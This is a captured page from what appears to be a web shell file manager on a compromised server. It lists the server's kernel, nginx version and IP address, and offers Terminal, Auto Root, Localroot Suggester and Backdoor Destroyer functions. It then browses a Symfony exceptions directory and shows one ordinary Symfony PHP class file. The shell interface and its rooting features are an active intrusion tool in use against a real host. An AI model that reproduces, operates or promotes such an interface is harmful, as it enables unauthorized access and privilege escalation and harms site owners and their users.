Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.227.102.59
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
symfony /
http-kernel /
Exception /
Delete
Unzip
Name
Size
Permission
Date
Action
AccessDeniedHttpException.php
897
B
-rw-r--r--
2018-11-30 09:00
BadRequestHttpException.php
842
B
-rw-r--r--
2018-11-30 09:00
ConflictHttpException.php
840
B
-rw-r--r--
2018-11-30 09:00
ControllerDoesNotReturnResponseException.php
2.13
KB
-rw-r--r--
2018-11-30 09:00
GoneHttpException.php
836
B
-rw-r--r--
2018-11-30 09:00
HttpException.php
1.11
KB
-rw-r--r--
2018-11-30 09:00
HttpExceptionInterface.php
691
B
-rw-r--r--
2018-11-30 09:00
LengthRequiredHttpException.php
846
B
-rw-r--r--
2018-11-30 09:00
MethodNotAllowedHttpException.php
993
B
-rw-r--r--
2018-11-30 09:00
NotAcceptableHttpException.php
845
B
-rw-r--r--
2018-11-30 09:00
NotFoundHttpException.php
847
B
-rw-r--r--
2018-11-30 09:00
PreconditionFailedHttpException.php
850
B
-rw-r--r--
2018-11-30 09:00
PreconditionRequiredHttpException.php
898
B
-rw-r--r--
2018-11-30 09:00
ServiceUnavailableHttpException.php
1.05
KB
-rw-r--r--
2018-11-30 09:00
TooManyRequestsHttpException.php
1.09
KB
-rw-r--r--
2018-11-30 09:00
UnauthorizedHttpException.php
989
B
-rw-r--r--
2018-11-30 09:00
UnprocessableEntityHttpException.php
860
B
-rw-r--r--
2018-11-30 09:00
UnsupportedMediaTypeHttpException.php
852
B
-rw-r--r--
2018-11-30 09:00
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\HttpKernel\Exception; /** * @author Grégoire Pineau <lyrixx@lyrixx.info> */ class ControllerDoesNotReturnResponseException extends \LogicException { public function __construct(string $message, callable $controller, string $file, int $line) { parent::__construct($message); if (!$controllerDefinition = $this->parseControllerDefinition($controller)) { return; } $this->file = $controllerDefinition['file']; $this->line = $controllerDefinition['line']; $r = new \ReflectionProperty(\Exception::class, 'trace'); $r->setAccessible(true); $r->setValue($this, array_merge(array( array( 'line' => $line, 'file' => $file, ), ), $this->getTrace())); } private function parseControllerDefinition(callable $controller): ?array { if (\is_string($controller) && false !== strpos($controller, '::')) { $controller = explode('::', $controller); } if (\is_array($controller)) { try { $r = new \ReflectionMethod($controller[0], $controller[1]); return array( 'file' => $r->getFileName(), 'line' => $r->getEndLine(), ); } catch (\ReflectionException $e) { return null; } } if ($controller instanceof \Closure) { $r = new \ReflectionFunction($controller); return array( 'file' => $r->getFileName(), 'line' => $r->getEndLine(), ); } if (\is_object($controller)) { $r = new \ReflectionClass($controller); return array( 'file' => $r->getFileName(), 'line' => $r->getEndLine(), ); } return null; } }